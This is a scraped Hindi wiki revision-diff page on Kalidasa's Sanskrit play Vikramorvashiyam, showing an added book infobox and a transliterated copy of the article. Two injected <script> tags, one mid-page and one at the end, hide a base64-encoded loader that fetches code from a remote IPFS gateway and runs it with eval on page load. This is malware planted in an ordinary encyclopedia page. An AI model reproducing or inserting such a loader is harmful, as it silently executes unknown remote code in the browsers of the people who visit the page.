Difference between revisions of "विक्रमोर्वशीयम्"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
Line 1: Line 1:
*विक्रमोर्वशीयम् [[कालिदास]] द्वारा रचित पाँच अंकों का एक त्रोटक<ref>उपरुपक</ref> है।  
+
{{सूचना बक्सा पुस्तक
*विक्रमोर्वशीयम् में राजा [[पुरुरवा]] तथा अप्सरा [[उर्वशी]] की प्रणय कथा वर्णित है।  
+
|चित्र=Vikramorvashi.jpg
*विक्रमोर्वशीयम् में [[श्रृंगार रस]] की प्रधानता है, पात्रों की संख्या कम है।  
+
|चित्र का नाम='विक्रमोर्वशीयम्' का आवरण पृष्ठ
*विक्रमोर्वशीयम् की कथा [[ऋग्वेद]]<ref>ऋग्वेद, 10/15</ref> तथा [[शतपथ ब्राह्मण]]<ref>शतपथ ब्राह्मण, 11/5/1</ref> से ली गयी है।  
+
|लेखक=
*महाकवि कालिदास ने विक्रमोर्वशीयम् नाटक को मानवीय प्रेम की अत्यन्त मधुर एवं सुकुमार कहानी में परिणत कर दिया है।  
+
|कवि= [[कालिदास|महाकवि कालिदास]]
*विक्रमोर्वशीयम् के प्राकृतिक दृश्य बड़े रमणीय हैं।
+
|मूल_शीर्षक = विक्रमोर्वशीयम्
 +
|मुख्य पात्र = [[पुरुरवा]] और [[उर्वशी]]
 +
|कथानक =
 +
|अनुवादक =
 +
|संपादक =
 +
|प्रकाशक = राजपाल प्रकाशन
 +
|प्रकाशन_तिथि = [[1 जनवरी]], [[2008]]
 +
|भाषा =
 +
|देश = [[भारत]]
 +
|विषय = 
 +
|शैली =
 +
|मुखपृष्ठ_रचना = अजिल्द
 +
|विधा = [[नाटक]]
 +
|प्रकार =
 +
|पृष्ठ =
 +
|ISBN = 978-81-7028-776
 +
|भाग =
 +
|विशेष = विक्रमोर्वशीयम् के प्राकृतिक दृश्य बड़े रमणीय हैं।
 +
|टिप्पणियाँ =
 +
}}
 +
'''विक्रमोर्वशीयम्''' [[कालिदास]] द्वारा रचित पाँच अंकों का एक त्रोटक<ref>उपरुपक</ref> है।  
 +
* विक्रमोर्वशीयम् में राजा [[पुरुरवा]] तथा अप्सरा [[उर्वशी]] की प्रणय कथा वर्णित है।  
 +
* विक्रमोर्वशीयम् में [[श्रृंगार रस]] की प्रधानता है, पात्रों की संख्या कम है।  
 +
* विक्रमोर्वशीयम् की कथा [[ऋग्वेद]]<ref>ऋग्वेद, 10/15</ref> तथा [[शतपथ ब्राह्मण]]<ref>शतपथ ब्राह्मण, 11/5/1</ref> से ली गयी है।  
 +
* महाकवि कालिदास ने विक्रमोर्वशीयम् नाटक को मानवीय प्रेम की अत्यन्त मधुर एवं सुकुमार कहानी में परिणत कर दिया है।  
 +
* विक्रमोर्वशीयम् के प्राकृतिक दृश्य बड़े रमणीय हैं।
  
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{कालिदास}}{{संस्कृत साहित्य2}}
 
{{कालिदास}}{{संस्कृत साहित्य2}}

Revision as of 10:55, 25 June 2013

vikramorvashiyamh
kavi mahakavi kalidas
mool shirshak vikramorvashiyamh
mukhy patr pururava aur urvashi
prakashak rajapal prakashan
prakashan tithi 1 janavari, 2008
ISBN 978-81-7028-776
desh bharat
vidha natak
mukhaprishth rachana ajild
vishesh vikramorvashiyamh ke prakritik drishy b de ramaniy haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vikramorvashiyamh kalidas dvara rachit paanch aankoan ka ek trotak[1] hai.

  • vikramorvashiyamh mean raja pururava tatha apsara urvashi ki pranay katha varnit hai.
  • vikramorvashiyamh mean shrriangar ras ki pradhanata hai, patroan ki sankhya kam hai.
  • vikramorvashiyamh ki katha rrigved[2] tatha shatapath brahman[3] se li gayi hai.
  • mahakavi kalidas ne vikramorvashiyamh natak ko manaviy prem ki atyant madhur evan sukumar kahani mean parinat kar diya hai.
  • vikramorvashiyamh ke prakritik drishy b de ramaniy haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. uparupak
  2. rrigved, 10/15
  3. shatapath brahman, 11/5/1

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>